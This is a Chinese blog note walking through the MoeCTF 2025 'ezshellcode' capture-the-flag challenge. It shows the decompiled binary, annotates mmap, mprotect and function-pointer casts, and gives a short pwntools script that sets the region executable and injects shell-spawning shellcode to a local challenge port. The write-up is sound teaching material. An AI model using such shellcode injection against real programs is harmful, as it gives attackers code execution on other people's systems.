【个人笔记】题目:MoeCTF_2025_ezshellcode

最新推荐文章于 2025-10-12 15:36:14 发布
原创 最新推荐文章于 2025-10-12 15:36:14 发布 · 516 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记 #网络安全 #系统安全

题目:MoeCTF_2025_ezshellcode
日期:25-9-9
题目逻辑:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+0h] [rbp-20h] BYREF
  int prot; // [rsp+4h] [rbp-1Ch]
  int v6; // [rsp+8h] [rbp-18h]
  int v7; // [rsp+Ch] [rbp-14h]
  void *s; // [rsp+10h] [rbp-10h]
  unsigned __int64 v9; // [rsp+18h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  init(argc, argv, envp);
  s = mmap(0LL, 0x1000uLL, 3, 34, -1, 0LL);
  if ( s == (void *)-1LL )
  {
    perror("mmap");
    return 1;
  }
  memset(s, 0, 0x1000uLL);
  v6 = 0;
  prot = 0;
  puts("In a ret2text exploit, we can use code in the .text segment.");
  puts("But now, there is no 'system' function available there.");
  puts("How can you get the flag now? Perhaps you should use shellcode.");
  puts("But what is shellcode? What can you do with it? And how can you use it?");
  puts("I will give you some choices. Choose wisely!");
  __isoc99_scanf("%d", &v4);
  do
    v7 = getchar();
  while ( v7 != 10 && v7 != -1 );
  if ( v4 == 4 )
  {
    if ( v6 == 1 )
      puts("You can only make one change!");
    prot = 7;
    v6 = 1;
  }
  else
  {
    if ( v4 > 4 )
      goto LABEL_24;
    switch ( v4 )
    {
      case 3:
        if ( v6 == 1 )
          puts("You can only make one change!");
        prot = 4;
        v6 = 1;
        break;
      case 1:
        if ( v6 == 1 )
          puts("You can only make one change!");
        prot = 1;
        v6 = 1;
        break;
      case 2:
        if ( v6 == 1 )
          puts("You can only make one change!");
        prot = 3;
        v6 = 1;
        break;
      default:
LABEL_24:
        puts("Invalid choice. The space remains in its chaotic state.");
        exit(1);
    }
  }
  if ( mprotect(s, 0x1000uLL, prot) == -1 )
  {
    perror("mprotect");
    exit(1);
  }
  puts("\nYou have now changed the permissions of the shellcode area.");
  puts("If you can't input your shellcode, think about the permissions you just set.");
  read(0, s, 0x1000uLL);
  ((void (*)(void))s)();
  return 0;
}

要点解析:
***** void ,一种通用类型指针,使s可以指向内存的任意区域。
***** mmap,系统调用,将文件或设备映射到内存中,这里用于分配一块匿名内存区域。0LL,建议的起始地址,0表示由系统自动选择地址。0x1000uLL,映射区内存大小,用于注入shellcode。3,内存权限(1可读,2可写,3可读可写,4可执行)。34,映射标志,匿名映射(内存区域不关联任何文件)和私有映射(对内存的修改不会影响其他进程)。-1,文件描述符,表示匿名映射。0LL,偏移量,0表示从文件开头开始映射,但因匿名映射,这个参数被忽略。
***** (void )-1,特殊的指针值,表示错误或无效指针,mmap失败会返回MAP_FAILED,这个宏通常被定义为(void )-1。
***** memset,将s指向的4096字节内存区域用0覆盖(即清空此内存区域),方便shellcode的注入,防止执行内存中原有的数据。
***** 理解“流”、“缓冲区”:标准输入是一条数据通往程序的流,是操作系统底层的一种文件,他直接存储键盘输入的数据。scanf等函数读取数据时只发起一次系统调用,一次性从标准输入中读很多数据存入缓冲区,避免了多次系统调用,提高了效率。三者位置关系为:【标准输入】→【缓冲区】→【程序】
***** read读取从标准输入位置开始往后的所有数据,而shellcode存在于缓冲区,所以如果缓冲区中存在数据,就会被read读取,污染shellcode。
***** getchar会从缓冲区中读取一个数据,通过do-while的配合,只要数据中还存在换行符或文件结束符就会持续循环直到缓冲区的垃圾数据被清空。
***** 输入4,不会触发第二层if,只会给v6赋值1,prot赋值7,后面的段else直接跳过,执行后面的if或puts。
***** mprotect用于修改内存权限(将从s开始的4096字节内存修改为prot的权限)并返回结果(成功返回0,失败返回-1),失败则触发if,输出报错。因为7代表可读可写可执行,所以上一次输入4将7赋给prot。
***** read从标准输入中读取4096字节数据(shellcode)存入s,稍后程序会执行这部分内容。
***** goto,跳转到指定标签的位置继续执行。这里的标签上是LABLE_24。
***** ((void ()(void))s)()拆解:“”说明这是一个指针,(void)表示这个指针不指向任何参数,()(void)共同表示这个指针指向一个函数,第一个void强制把s转换为()(void),即指向一个函数的指针,至此shellcode成为了可执行的函数而不是不可执行的数据。最后的()是函数调用操作符,表示“调用这个函数”。
解题思路:
为了使shellcode所在内存得到可写可执行权限,第一次应输入4,将7赋给prot,随后getchar会清空缓冲区,read等待输入,这时注入shellcode,随后()(void)把s由数据指针转换为函数指针,使shellcode可执行。程序执行到shellcode,拿到shell。
解题脚本:

from pwn import *                                   
context(arch='amd64', os='linux', log_level='debug') 


# io = process('./pwn(1)')
io = remote("127.0.0.1",33265)
io.recvuntil('wisely!')
io.sendline('4')

io.recvuntil('set.')

shellcode = asm(shellcraft.sh())
io.sendline(shellcode)

io.interactive()

***** shellcraft.sh():直接生成用于启动shell的汇编代码的工具。asm将汇编代码转换为机器码。

Android之运行app提示The application could not be installed: INSTALL_FAILED_TEST_ONLY
码莎拉蒂
02-09 3万+
1、问题 笔记本新安装的Android studio(版本3.5.2)运行最简单的程序,错误提示如下 The application could not be installed: INSTALL_FAILED_TEST_ONLY 2、分析 高版本的Android studio里面AndroidManifest.xml文件默认如下 android:testOnly=...
RESTful学习笔记 --- TypeError: __init__() got an unexpected keyword argument 'method'
热门推荐
杨鑫newlife的专栏
12-16 6万+
RESTful学习笔记 --- TypeError: __init__() got an unexpected keyword argument 'method'
个人笔记题目MoeCTF2025_EZtext
Java_new_2020的博客
09-01 491
题解及相关知识点
个人笔记题目MoeCTF2025_find_it
Java_new_2020的博客
09-04 600
摘要: 该题目考察文件描述符操作与栈溢出防护。程序通过dup(1)复制标准输出到fd3后关闭fd1,要求用户输入正确的fd1值(3)。随后要求输入文件名(如flag)并由open重新分配fd1指向该文件。最后通过正确输入fd2(1)读取文件内容并输出。关键点在于理解文件描述符的分配机制(dup返回最小可用fd)以及close(1)后open会重用fd1。解题需依次输入3、flag文件名和1,利用重定向的文件描述符泄露flag内容。
MoeCTF2025-Reverse(week1)
最新发布
2303_79314941的博客
10-12 817
MoeCTF2025 re方向week1题解
MoeCTF_2023新生赛 Reverse题解WP【详解】-(学习记录)‘‘
Sciurdae的博客
10-21 2371
MoeCTF是我学习Re以来接触的第一个比赛!举办的很nice!(づ ̄3 ̄)づ╭❤~明年看看有没有时间,akakak要ak一次才完整a!Github仓库题目下载还差几题,有空补上,还需努力。
个人笔记题目MoeCTF2025_ez_u64
Java_new_2020的博客
09-01 392
题解及相关知识点解析
moectf 2024 垫刀之路01:moectf?启动!
voice670的博客
07-17 428
这题提示我们getshell以后不知道去哪可以看看环境变量。明确了以后直接看一下环境变量。
DevTools 无法加载 SourceMap 错误:状态代码 404,net::ERR_HTTP_RESPONSE_CODE_FAILURE
梦凝哲雪
08-02 1万+
浏览器控制台 一直显示警告 某些有小洁癖的前端程序员 实在 蓝瘦香菇!!! 如图所示: DevTools无法加载源映射∶无法加载http:l/m.y .com:8B8/NC_103 5_blog[js/axios,.map的内容: HTTP错误:状态代码44, net:Ee_iTPp_RESsa0isE_COE FAILURE axios.js源码位置 1756行 源代码该行被注释 什么是 Source Map 在前端开发过程中,通常我们编写的源代码会经过多重处理(编译、封装、压缩等),最后形成产物
pip安装psycopg2报错“Error: pg_config executable not found.”
Sally_xy的博客
03-22 8038
pip安装psycopg2报错“Error: pg_config executable not found.”1. 现象2. 解决方案3. 验证 1. 现象 在学习部署“学习笔记”项目时,为管理 Heroku 使用的数据库,使用 pip 安装 psycopg2,安装时报错“Error: pg_config executable not found.”: 2. 解决方案 安装 postgresql brew install postgresql 安装时可能会遇到问题 “No such file or d
【QT】widget.obj:-1: error: LNK2019: 无法解析的外部符号 __imp_PostMessageW,函数 “private: void __cdecl Widget
胡先森i的博客
11-14 1万+
问题: 我在QT学习的过程中,遇到一个非常棘手的问题,简单而又复杂。网上找到一堆什么删除Debug下的文件夹再重新构建,屁用没有。在几番百度谷歌搜索下,终于找到一个解决办法,在此非常感谢前辈大佬的笔记,真的有用。先简单描述一下问题:编译后报错,以下几个,看的我是头疼不已! error: LNK2019: 无法解析的外部符号 __imp_PostMessageW,函数 "private: void __cdecl Widget::refresh(struct HWND__ *)" (?refresh@Widg
moectf2023学习笔记
Fab1an的博客
08-15 2315
也可以在这里改cookie的值。
moeCTF题解-0x03】Algorithm
框架科工:Framecraft
11-03 1052
title:moeCTF题解-0x03】Algorithm categories: CTF moeCTF tags: CTF 【moeCTF题解-0x03】Algorithm 计算是宇宙的本质 (并不) 这部分主要是一些数据处理题和算法题。 数据处理题用Python做较为容易。 算法题要求用C++,我不太擅长;又因都是一些经典的题目,万维网上其他大佬的题解很多,故没有去做,这个题解中会放一些其他人题解的链接。 【moeCTF题解】总目录如下: 【moeCTF题解-0x00】序 .
http
ytl_storm的博客
08-17 131
http协议。
MoeCTF2022 部分Crypto 复现
Luiino的博客
11-05 3882
用基础方法解不出来,原因是e与phi_n不互素,又phi_n = (p-1)*(q-1),求gcd(e,(p-1))和gcd(e,(q-1)),发现e与p-1互素。choice用法:从非空序列中随机选取一个数据并带回,该序列可以是list、tuple、str、set。,计算delt + N是否为完全平方数,如果为完全平方数,那么delt + N =Wilson定理:如果p是素数,则(p − 1)!可以知道p、q相近,则|p-q|很小,进而。因此,我们可以爆破差值delt,即。与 N 相差很小,从而。
moeCTF题解-0x06】Web
框架科工:Framecraft
11-06 2836
title:moeCTF题解-0x06】Web categories: CTF moeCTF tags: CTF Web Python 【moeCTF题解-0x06】Web 竟然AK了这部分,但也只是因为题目简单…… 考虑到在XDSEC里选了web方向,也要好好学习web知识呀 【moeCTF题解】总目录如下:(若本文图片看不见请访问以下相应的地址) 【moeCTF题解-0x00】序 (包括Sign in) 【moeCTF题解-0x01】Reverse (包括An.
探索MoeCTF_2023:技术驱动的安全竞技平台
gitblog_00088的博客
04-21 751
探索MoeCTF_2023:技术驱动的安全竞技平台 项目简介 是一个由XDSEC团队开发的网络安全竞赛平台,旨在提供一个友好、创新的环境,让参与者能够学习和提升自己的安全技能。通过CTF(Capture The Flag)比赛的形式,用户可以挑战一系列网络安全问题,涵盖Web安全、逆向工程、密码学等多个领域。 技术分析 架构设计 MoeCTF_2023采用了微服务架构,将复杂的业务逻辑拆分为多个独...
2024-moectf Web WP
2301_80185313的博客
10-15 2525
moectf web wp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值